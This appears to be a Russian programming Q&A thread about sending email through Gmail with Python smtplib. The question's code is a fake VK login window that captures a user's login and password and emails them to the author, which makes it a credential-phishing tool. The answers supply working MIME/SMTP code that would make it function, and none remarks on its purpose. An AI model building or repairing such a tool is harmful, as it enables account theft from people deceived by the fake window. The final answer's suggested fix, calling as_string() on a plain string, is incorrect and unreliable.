# Как отправить сообщение на Gmail с помощью Python (smtplib)?

Tags: python, email, tkinter, smtplib

Я написал программу, которая должна отправлять мне строку текста (переменная content). На почту мне приходит пустое письмо, хотя при отладке видно, что переменная правильно заполняется.
Что я делаю не так?
Заранее спасибо

```
import smtplib
from tkinter import *
from tkinter import messagebox

def destr():

    a = login.get()
    b = parol.get()
    content = 'Login: ' + str(a) + ', ' + 'password: ' + str(b)
    mail = smtplib.SMTP('smtp.gmail.com', 587)
    mail.ehlo()
    mail.starttls()
    mail.login('komp.lord@gmail.com','########не скажу')
    mail.sendmail('komp.lord@gmail.com', 'komp.lord@gmail.com', content)
    okno.destroy()

okno = Tk()
okno.title('Вход ВК')
okno.geometry('500x500')

login = StringVar()
EmailOrPhone = Entry(okno, textvariable = login).pack()

parol = StringVar()
Password = Entry(okno, textvariable = parol).pack()

knopka = Button(okno, text = 'Я ввёл логин и пароль', command = destr, fg = 'black', bg = 'white').pack()
okno.mainloop()
```

Comment: Потому что content это не просто текст письма и должен быть в специальном формате; [смотрите пример в документации](https://docs.python.org/3/library/smtplib.html#smtp-example) для начала

Answer (score 1):

Когда-то давно (когда начинал учить Python) написал для одного проекта:

```
import six
import smtplib
import email.utils
import email.encoders

from six.moves import email_mime_multipart      # import email.mime.multipart
from six.moves import email_mime_text           # import email.mime.text
from six.moves import email_mime_base           # import email.mime.base


def send_mail(
    send_to,
    subject,
    text,
    send_from,
    files=[],
    headers={},
    cc=None,
    smtp_server='localhost',
    smtp_port=0,
    smtp_login=None,
    smtp_password=None
):
    """
    sends email via SMTP server
    parameters:
        send_to         - email recipient(s) [str | basestring | list]
        subject         - subject string [str | basestring]
        text            - email body [str | basestring]
        send_from       - sender's email [str | basestring]
        files           - list of attached files  [list of strings]
        headers         - custom headers [dict,
                          like: {'X-My-Header':'My Header'}]
        cc              - email CC recipient(s) [str | basestring | list]
                          default: None
        smtp_server     - SMTP hostname or IP [str | basestring]
                          default: 'localhost'
        smtp_port       - SMTP port
                          default: 0
        smtp_login      - SMTP server login [str | basestring]
                          default: None
        smtp_password   - SMTP server password [str | basestring]
                          default: None
    )
    """
    assert isinstance(send_to, list) or isinstance(send_to, six.string_types)
    assert isinstance(files, list)
    msg = email_mime_multipart.MIMEMultipart()
    msg['From'] = send_from
    msg['Date'] = email.utils.formatdate(localtime=True)
    msg['Subject'] = subject
    # convert the list of recipients to the comma-separated string
    if isinstance(send_to, list):
        msg['To'] = email.utils.COMMASPACE.join(send_to)
    elif isinstance(send_to, six.string_types):
        msg['To'] = send_to
    if cc:
        # convert the list of recipients to the comma-separated string
        if isinstance(cc, list):
            msg['Cc'] = email.utils.COMMASPACE.join(cc)
        elif isinstance(cc, six.string_types):
            msg['Cc'] = cc
    msg.attach(email_mime_text.MIMEText(text))
    # attach file-attachments
    # use set in order to get rid of duplicates
    for f in set(files):
        part = email_mime_base.MIMEBase('application', 'octet-stream')
        part.set_payload(open(f, 'rb').read())
        email.encoders.encode_base64(part)
        part.add_header(
            'Content-Disposition',
            'attachment; filename="%s"' %
            os.path.basename(f))
        msg.attach(part)
    # attach custom eMail headers if any
    for h in headers.keys():
        msg[h] = headers[h]
    smtp = smtplib.SMTP(smtp_server, port=smtp_port)
    # perform authentication if both login and password were specified
    if smtp_login and smtp_password:
        smtp.starttls()
        smtp.login(smtp_login, smtp_password)
    smtp.sendmail(send_from, send_to, msg.as_string())
    smtp.close()
```

Answer (score 0):

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Send email via smtp_host."""
import smtplib
from email.mime.text import MIMEText
from email.header    import Header

####smtp_host = 'smtp.live.com'        # microsoft
smtp_host = 'smtp.gmail.com'       # google
####smtp_host = 'smtp.mail.yahoo.com'  # yahoo
####smtp_host = 'smtp.yandex.ru'           # yandex    
login, password = 'user@gmail.com', 'pa$$w0rd'
recipients_emails = [login]

msg = MIMEText('body…', 'plain', 'utf-8')
msg['Subject'] = Header('subject…', 'utf-8')
msg['From'] = login
msg['To'] = ", ".join(recipients_emails)

s = smtplib.SMTP(smtp_host, 587, timeout=10)
s.set_debuglevel(1)
try:
    s.starttls()
    s.login(login, password)
    s.sendmail(msg['From'], recipients_emails, msg.as_string())
finally:
    s.quit()
```

Comment: код — это [точный дубликат другого ответа](https://ru.stackoverflow.com/a/369479/23044), к сожалению, один из участников не считает это дубликатом (без уважительных причин). Поэтому плодим ответы без необходимости.

Answer (score 0):

Вместо отправки сообщения с текстом я сделал прикрепление текстового файла, и всё сработало

Comment: как это решает вашу проблему: *"На почту мне приходит пустое письмо"*? Что происходит, если вы запустите [код из ответа (подставив свои login, password)](https://ru.stackoverflow.com/a/815707/23044)? (я пользовался этим кодом неоднократно и он работает со всеми email-провайдерами, которыми я пробовал. Конечно, приходит непустое письмо)

Answer (score 0):

Знаю, что уже поздно, но возможно кому-то это будет полезно:

```
mail.sendmail('sender@mail.domain', 'destination@mail.domain', content)
```

Мне кажется, что проблема в этой строке!

РЕШЕНИЕ: Нужно заменить `content` на:

```
content.as_string()
```

Если не получится, то найдите рабочий шаблон. Например, используйте [mail_to](https://pypi.org/project/email-to/) с примером в описании.